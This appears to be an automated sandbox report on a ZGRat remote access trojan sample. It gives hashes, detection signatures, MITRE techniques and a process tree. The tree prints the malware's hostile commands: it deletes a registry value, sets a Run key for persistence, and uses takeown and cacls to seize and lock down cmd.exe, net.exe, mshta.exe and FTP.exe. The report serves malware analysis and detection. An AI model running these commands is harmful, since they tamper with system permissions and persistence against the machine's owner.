zgrat | 5db8023447245906617f62d910ede059895ee337738844846d9553f2270df0ad

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
15-03-2024 19:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

915KB
MD5

4b90f9e1b74c0e79a7c6414d7dbfe0b8
SHA1

6cda4311fb2558aafc496e4c193d7bb88a6d9e6b
SHA256

5db8023447245906617f62d910ede059895ee337738844846d9553f2270df0ad
SHA512

0cfd3dbb74f703bd71957649f2be78b6ab2ba414fc4634c51738d428abf8225b4a7c0f8938acf40d26555a4e40700f49b21627ca66ec14ef7be5b8109d90d11d
SSDEEP

6144:eWyMTC6XtGBn6jiPiBbknj0+xuKxgiYyehF1p7F8ptE5yRd/JORBdH7kw/jeNz4:GfCkcKxJYFVW3Egfm1Y79o5bGsx8Om

Score

10^/10

zgrat discovery persistence rat

Malware Config

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral2/memory/3944-3-0x00000169B9980000-0x00000169B9BCC000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-4-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-5-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-7-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-9-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-11-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-13-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-15-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-17-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-19-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-21-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-23-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-25-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-27-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-29-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-31-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-33-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-35-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-37-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-39-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-41-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-43-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-45-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-47-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-49-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-51-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-53-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-55-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-57-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-59-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-61-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-63-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-65-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1
behavioral2/memory/3944-67-0x00000169B9980000-0x00000169B9BC6000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	tmp.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2824	takeown.exe
4452	takeown.exe
5092	takeown.exe
2932	takeown.exe
1456	takeown.exe
4232	takeown.exe
2844	takeown.exe
2908	takeown.exe
4788	takeown.exe
5088	takeown.exe
2152	takeown.exe
1520	takeown.exe
3308	takeown.exe
1404	takeown.exe
4876	takeown.exe
4584	takeown.exe
2812	takeown.exe
4100	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ozmsgigoe = "C:\\Users\\Admin\\AppData\\Roaming\\Ozmsgigoe.exe"	tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	3944	tmp.exe
Token: SeTakeOwnershipPrivilege	5088	takeown.exe
Token: SeTakeOwnershipPrivilege	2824	takeown.exe
Token: SeTakeOwnershipPrivilege	4584	takeown.exe
Token: SeTakeOwnershipPrivilege	2812	takeown.exe
Token: SeTakeOwnershipPrivilege	2152	takeown.exe
Token: SeTakeOwnershipPrivilege	4452	takeown.exe
Token: SeTakeOwnershipPrivilege	1456	takeown.exe
Token: SeTakeOwnershipPrivilege	1520	takeown.exe
Token: SeTakeOwnershipPrivilege	4232	takeown.exe
Token: SeTakeOwnershipPrivilege	2844	takeown.exe
Token: SeTakeOwnershipPrivilege	3308	takeown.exe
Token: SeTakeOwnershipPrivilege	5092	takeown.exe
Token: SeTakeOwnershipPrivilege	2908	takeown.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	4100	takeown.exe
Token: SeTakeOwnershipPrivilege	2932	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3944 wrote to memory of 928	3944	tmp.exe	110
PID 3944 wrote to memory of 928	3944	tmp.exe	110
PID 928 wrote to memory of 416	928	cmd.exe	112
PID 928 wrote to memory of 416	928	cmd.exe	112
PID 928 wrote to memory of 5088	928	cmd.exe	113
PID 928 wrote to memory of 5088	928	cmd.exe	113
PID 928 wrote to memory of 2008	928	cmd.exe	115
PID 928 wrote to memory of 2008	928	cmd.exe	115
PID 928 wrote to memory of 2684	928	cmd.exe	117
PID 928 wrote to memory of 2684	928	cmd.exe	117
PID 928 wrote to memory of 3660	928	cmd.exe	118
PID 928 wrote to memory of 3660	928	cmd.exe	118
PID 928 wrote to memory of 5100	928	cmd.exe	119
PID 928 wrote to memory of 5100	928	cmd.exe	119
PID 928 wrote to memory of 2112	928	cmd.exe	121
PID 928 wrote to memory of 2112	928	cmd.exe	121
PID 928 wrote to memory of 4632	928	cmd.exe	122
PID 928 wrote to memory of 4632	928	cmd.exe	122
PID 928 wrote to memory of 4064	928	cmd.exe	123
PID 928 wrote to memory of 4064	928	cmd.exe	123
PID 928 wrote to memory of 1056	928	cmd.exe	124
PID 928 wrote to memory of 1056	928	cmd.exe	124
PID 928 wrote to memory of 2844	928	cmd.exe	125
PID 928 wrote to memory of 2844	928	cmd.exe	125
PID 928 wrote to memory of 2156	928	cmd.exe	126
PID 928 wrote to memory of 2156	928	cmd.exe	126
PID 928 wrote to memory of 4812	928	cmd.exe	127
PID 928 wrote to memory of 4812	928	cmd.exe	127
PID 928 wrote to memory of 3292	928	cmd.exe	128
PID 928 wrote to memory of 3292	928	cmd.exe	128
PID 928 wrote to memory of 3172	928	cmd.exe	129
PID 928 wrote to memory of 3172	928	cmd.exe	129
PID 928 wrote to memory of 3328	928	cmd.exe	130
PID 928 wrote to memory of 3328	928	cmd.exe	130
PID 928 wrote to memory of 3168	928	cmd.exe	131
PID 928 wrote to memory of 3168	928	cmd.exe	131
PID 928 wrote to memory of 3016	928	cmd.exe	132
PID 928 wrote to memory of 3016	928	cmd.exe	132
PID 928 wrote to memory of 2824	928	cmd.exe	133
PID 928 wrote to memory of 2824	928	cmd.exe	133
PID 928 wrote to memory of 3020	928	cmd.exe	134
PID 928 wrote to memory of 3020	928	cmd.exe	134
PID 928 wrote to memory of 3008	928	cmd.exe	135
PID 928 wrote to memory of 3008	928	cmd.exe	135
PID 928 wrote to memory of 2152	928	cmd.exe	136
PID 928 wrote to memory of 2152	928	cmd.exe	136
PID 928 wrote to memory of 5064	928	cmd.exe	137
PID 928 wrote to memory of 5064	928	cmd.exe	137
PID 928 wrote to memory of 4704	928	cmd.exe	138
PID 928 wrote to memory of 4704	928	cmd.exe	138
PID 928 wrote to memory of 1520	928	cmd.exe	139
PID 928 wrote to memory of 1520	928	cmd.exe	139
PID 928 wrote to memory of 3332	928	cmd.exe	140
PID 928 wrote to memory of 3332	928	cmd.exe	140
PID 928 wrote to memory of 1444	928	cmd.exe	141
PID 928 wrote to memory of 1444	928	cmd.exe	141
PID 928 wrote to memory of 1284	928	cmd.exe	142
PID 928 wrote to memory of 1284	928	cmd.exe	142
PID 928 wrote to memory of 1404	928	cmd.exe	143
PID 928 wrote to memory of 1404	928	cmd.exe	143
PID 928 wrote to memory of 4628	928	cmd.exe	144
PID 928 wrote to memory of 4628	928	cmd.exe	144
PID 928 wrote to memory of 3100	928	cmd.exe	145
PID 928 wrote to memory of 3100	928	cmd.exe	145

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    3⤵
    PID:416
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2008
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /g Administrators:f
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3660
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Users:r
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2112
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4064
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    3⤵
    PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2844
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    3⤵
    PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4812
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d "network service"
    3⤵
    PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3172
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g system:r
    3⤵
    PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3168
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:3016
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3020
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2152
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    3⤵
    PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4704
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    3⤵
    PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3332
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    3⤵
    PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1284
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    3⤵
    PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4628
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    3⤵
    PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1248
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2052
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:1864
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4772
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /g Administrators:f
    3⤵
    PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2496
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Users:r
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3⤵
    PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4988
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d SERVICE
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3968
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3⤵
    PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:416
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d "network service"
    3⤵
    PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2676
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d system
    3⤵
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4276
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:612
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1468
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    3⤵
    PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3048
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3⤵
    PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:368
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:408
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3⤵
    PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:640
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4604
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d system
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3020
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:2324
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\net1.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5064
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /g Administrators:f
    3⤵
    PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4224
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Users:r
    3⤵
    PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:712
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3⤵
    PID:1928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3724
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d SERVICE
    3⤵
    PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4680
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3⤵
    PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1044
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d "network service"
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:872
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d system
    3⤵
    PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3848
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:4772
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\net1.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1684
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3⤵
    PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2388
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:936
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3⤵
    PID:2556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2972
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4316
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3⤵
    PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1316
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    3⤵
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4276
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d system
    3⤵
    PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4928
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:2728
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\mshta.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2844
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /g Administrators:f
    3⤵
    PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:368
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Users:r
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3292
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    3⤵
    PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3988
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3168
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3980
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d "network service"
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2588
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d system
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2900
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:5064
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\mshta.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2980
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    3⤵
    PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1680
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5008
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    3⤵
    PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4216
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2052
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    3⤵
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2984
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    3⤵
    PID:720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3580
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:4896
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\FTP.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2752
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /g Administrators:f
    3⤵
    PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3348
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Users:r
    3⤵
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2960
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    3⤵
    PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2972
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4092
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    3⤵
